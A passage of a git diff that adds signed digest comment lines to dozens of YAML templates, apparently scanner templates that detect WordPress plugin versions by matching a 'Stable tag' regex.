a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206edb9723c6736bad572e1c5360615a93320e691413e9515b391edb45973eddb6022000f0e03f549876c3f36efa4b7f20f8d81d858aa7ab11246a6ef236d4f5b71ffe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..9eb1bbd251 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a3e9ecf3d5cc2438b711a2d55747bd18ca4d10dcaefad2123a5e1e0febcaa1d902210091d4e2b992635058d2bc52a49d13a39aa68cc0f9e3770b183579c8e01e0e8028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..055d739945 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008df0b9637988b2ab8f8d98d23ee5f15e8970140d0bcf23e6150912a6ff76d533022100e3f8e930a97a4290cc007582db84e8459b4bdfe2777524854c6dce582068c8e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..3a45c0b193 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021626dcf6f52ef9e814ee61767b5baf01dee0eabd067f8f48d1bab2afe1c20ed022100d7895237b2a47affc4115b4bb4f0705dc2e9ea973bddec578296120ed7ed671b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..aed4a934ee 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100966c15190ba008645b9019526dbdd9df09ccc78c3d64529f1a022ce38eafc826022100c2c4809e823459bba3778383b01632d2762355d55cfb8fbc0b4b6b7ef3be6dc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..3250ef47d9 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207dcad544fd9dc7d1663df4fbf9c120830b8d4a1161786308a7187da17b3e7ea5022100932cf6ae9074472c3da6da92b46247f39e0a1c4ab6780ef431ddedada2f2c4bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..aff4497532 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203a92b364b5e52179749c7232e5187811e866afa207a9880725372aab43a64f2e022050a74d7acdd258f6ae794166880d3293d644e5f6a8f0a7f6b99305a885b88f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..f0a9533e99 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd95b9d84c84a115f57fd3c640aa52896eb1cc4be9f1e0319ccc5a984df8cc350221008ba18a3eee85b1d8d8925970e6954b331f90f1e03c321f81acf36f11e65d2772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..c50f1dfef6 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071b4bedecd6530615826e9c4a9734d2ac6a68749a27edbb22407500fc3b253f0022100904171720044e1b5110d7e5e27127c6736d057e80252e149d0b651fd72bf73b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..0b88e11302 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022076f0936e725f9b1ea28840a0fa160cecfd8acbfdb18604c2a652d8b14b2e1289022003a25e9f99bbf1751db251cab7d9a70f5058c0102d1075af845a00fee437afb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..bce45dcf4c 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f3a1061169bae8aabf01fadf564f2ef14c69ce62718e5d8bcaadfcd790cea88022100f0bca5c057ae41f26a97782bff34d9419637e1067732acc43aab227370457968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..de14040cb2 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022077f2c6b329a1829a592c0a921a6be85478cec39f70f91c9d6795ed076583bddf022100c7f2fbde20826fee9aa6308af2951876368f2f1f16ac42da8408129207d19da5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..e31a857cf9 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fc4c408d0c470f2c0584675823601449e09ad8dc8a4e3f2a0ba5ed97d9b4582202207965b6406523598b55adb0d9660523afa68badbb2b847f215caca92e8d1563ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..45aa5c5b44 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df714e2f6fa99d2d355e2e8b28c9e23e40f28ee99192892062df1aeec19e7512022031c4472a3357e6df3eec13baaa1216ee30c1d7877f475abcbbe9ecf090d191b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..1542f01067 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c4339f08194f73802002eda26605bea1b9e09387a4b017a2e7a2921d281978a20221009f40ed1a260eb57932a0944f9d685261130e5afbf58ca90817d4e246ace0056f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..ff09e5c700 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b908f6d4cb6b93291846fa49e4a0c406d1584b5b7a12238ae2ebdb0acbef8b5f022043984594cc8b60dfac64084f7a8294f734e679f49bcb7f4970b2294b045154d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..beb9e35c46 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097b90758079ab8c6fb09b7e30eeeed631ea9d53c660e9896e0d79956e399cf6b022100c26421ebf9d2eac8776858caa514995a0a772e6fdb22956035f08c538b017274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..145f74d806 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201782cd0bcce9c13db5a6e38fb63a2c8c30957e14b8fdb436646791e5e6b30f43022100c66000f799106d297c5a71c039de882f53496b7b313f5d8a6cdcf26623e07fcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..21e0f12172 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203ced6507644a1bb1a3ce94f51d9aa92aebe82d0b0a7225ee4e9a9df3df8f2f52022019cb1aecb38e12b262a40dbf925a40be2bd87199cb2e354a0d6c7993576e20dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..0bf4b84c03 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008324d7faa71aa472057417dc474260f265f20357dd69dba0d2f1228b9462e2b1022100c7fe50abc194761459b64c1a8eb0ed6928438b6486af1e6713c3d64c0d786136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..80d8311ead 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050bfdc1b016abc6519b737a378b68ae4d78933364843ec94406928bb430c1b5e0220240d1ed79216fd1be6dd606a5a252aa70886b73314c188e95e57b93eee1899ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..73d41f32db 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207df2ea69921422bbcc246cbff12e6293bd0a8cbe7f5dd61c0f404f079607edfc022072594547f6ad0aca0198c2f86f697e8120fd58ecd0caa591d69a6ef6d5558f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..1229827cfd 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d97c992eb9410757cd5d1e81fd7bf4ee6f2fe82b89e12844015ec1a06766c0a022100b21529671646d72ee8769de037b09eaf4ff742375647ae6f158fa9948862412d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..f599994dae 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b04479c8595017899c73fbed5c03eea505c936597e59fb2fcdb8a97af3369c65022059df2cf156cc95b39288c05d3c14dee05bd15681c09f8d30c9f5c8a1daa052fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..39aa2fb08f 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c74ccc5358f149659a1816595c1a79b07b4fcbd585fd70c9840dc7cbb34ad9ae02206f812796c9733931133948b54386a649108fe4e58429775356f2499ca5d85712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..d8ed3f7813 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202fb97129128d726c94715aef7e5efd013433124315869ad1cb5cdacda8bfca5f022075462e0f14e87fa195e863c1ac0f04a63a8aa53110b38f8b004bb91a0b6699d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..ead4854fde 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f43d2e1c81f05974354bec07fbd1d61d933f905c9d7051c59d4a8c452441b98b022100c06f381b88f9d87d8f3b38fc8a3f36a4b7912bd58f13a848404e8521600982b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..2805bfe423 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220690aa22de841a4565f23ad67b72195ca0de1237e81ec519379a8069460729972022100a8291c18d0c74465e39fe9cddf26619526840860906f233c45dea68344fd807b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..1b3bc4df12 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e00f49de3fe478b66164964365341fb2b2256a904a4ecb21ad513b2750b0756022016ec06b4bee3cc6aafe99b2db3a13b64646892425aff62b95f6bfb37d4040867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..bb881e8a28 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022075b73febe3ff06b6dcfed643eeda968d823133773467fefc27fcbbb88259b16302206c39309afe06b47257035b29cd125b685b04c6f174c31f4adfdcaf4c3ecb6378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..232867c6b9 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e439512a6c35734283e67741a6bc01e441ce457874b7b98a37414c0a360cce702206c6cf039f22bebc62105b30721442279f4b522cb139e4b8f2d700723349effcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..ce12a98816 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dec77d93d33b0a592c62a934e3936dffea8f0d1e89bbfb2f4d1253779d1aa50e0221009b5518a10a1daa440474c56b7c462f521b6626d871e927390d2612644bdff27b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..c90a854e69 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022035f9d095c41ab0d3f391683467a9c53b0de3497ad1f103125ab9fb828a414ed402207eb9f16a123ee750d831cc552aa11412e8377dff1423f35e9d3d4d1a392b2ccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..a7a9fdb63e 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205be3383cb9b084dabb44062477a21b97b64d50cc76947372c0ce9d60b3887da7022070838964786011f26a7ed2b2ea742a5e29c7f143043a9c2e48bfaa09be41de5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..c877300883 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a5ff37e5fac7f4153b6131ccaf8f898ac9386a1f62745b9c26c1ca22e28b8c30220302d51df30e2751e88c0c735cd6ccb051ee929335b6d7c24f213bc73844610f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..088efba661 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202f8ec2ca8016d6dea0634ee3fa96ff19653ef8f3d1019d7c882552b0de94275c02200df039c05ef42d3513b1b242034a248500e383f05791fee65a74df7b0cf10883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..46a0e7d242 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100de54cca0eccf4bb140e00add1fe63235a58943aaf474dc8b8fe1005c29add71c02210093e5d4d4c308fb1e43dfe8fe3bd1e7fdddf40382821169f5da970a72ac5d491c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..4f623eaf83 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008ac5b8c4179b99fdd4271b843f399a806a35f3e77d5b04c7b46edec7a0f4053002200f04088b4685817032203dca46b687f09695cb20bfa37420525ae9eb1368be55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..d5f2718f37 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b4c34d6656e1c2ccd81d870fe427361464c31c16d393bbbf66c85b35c5f3117a022100a64998adc291eaecb67f5646a46844c83e2aa06fdd43acff23b2331af721a864:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..de2fe49832 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220753036e03aaa3dbe280f639079177fbe1b66e127da51ff615527213bdd4a1205022033d383b372734518f3defaff78b602917ed2f3af822a4f7350c924d3d1713039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..cb5ad6b3a1 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201f8f82bf5febba8e2db86a845827134673b9ba9d8e795c21b9ef8644612d9900022044c4a42d70041e93c64bdbd68bde4e830400287f92c91f31b709f83ff02e4686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..f22a7e6a3e 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220300b2ba420748fb85320956e1f97669e6712a8ba8f8a84a0599128a251cb9876022100c14cc3f1d4e2b7df9f1e5bf9c175a7f743082fa21fc59b0dcba059c0a247d04f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..b84ff9ef20 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205cfd3b23045537e657f15d845eb6545268da64e22c76c8093351ff34b8389a6b022100d977fa68d216ca750a10c57f511b392accff36b62b67e12211558b621212da78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..fb1672e1f6 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022006cdf48c3b9568b507ec3274c276e12cc65badbcd98e94ba8ed232342dbb2a15022100cfadbdc5cb4b43fc973319092b425ece6b0157a075c0f2127848e4b4db6414b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..241b665891 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2875570753c60f6a0f2b1b733cc3e8c4b7786454b6041c1efbf15994f97180b022100c74ff866e1f54782f693721384ed8e27a0016f307f3e69af432a373b518c6680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..a23088bd81 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cfbca309ca3ead79620290dc4076619dadbdcc1edb0b9f928086faaad84f60f502205fa2fbb948fc13d9db8b6c6d63cb4053b3d291323dd5bedf6d08b390d18f9b31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..1f05aaa4ef 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203127969a8b5499f56bb733bdd0920c3d79d8339b2ae3c4589a025f35ce3ad5af02202c044d0c80268f22398acdfd92532b5c324c080ad1a687a926305e3c2300b9cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..84c3b5da11 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220447d0556ac39135757b1446a0e5563ae89cf57d57950e1b92abbf7e76e8fdd15022038f47bd4d79b5e32704325cb0acc022d4316ef484dbe1e423ce3000a95f2e264:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml 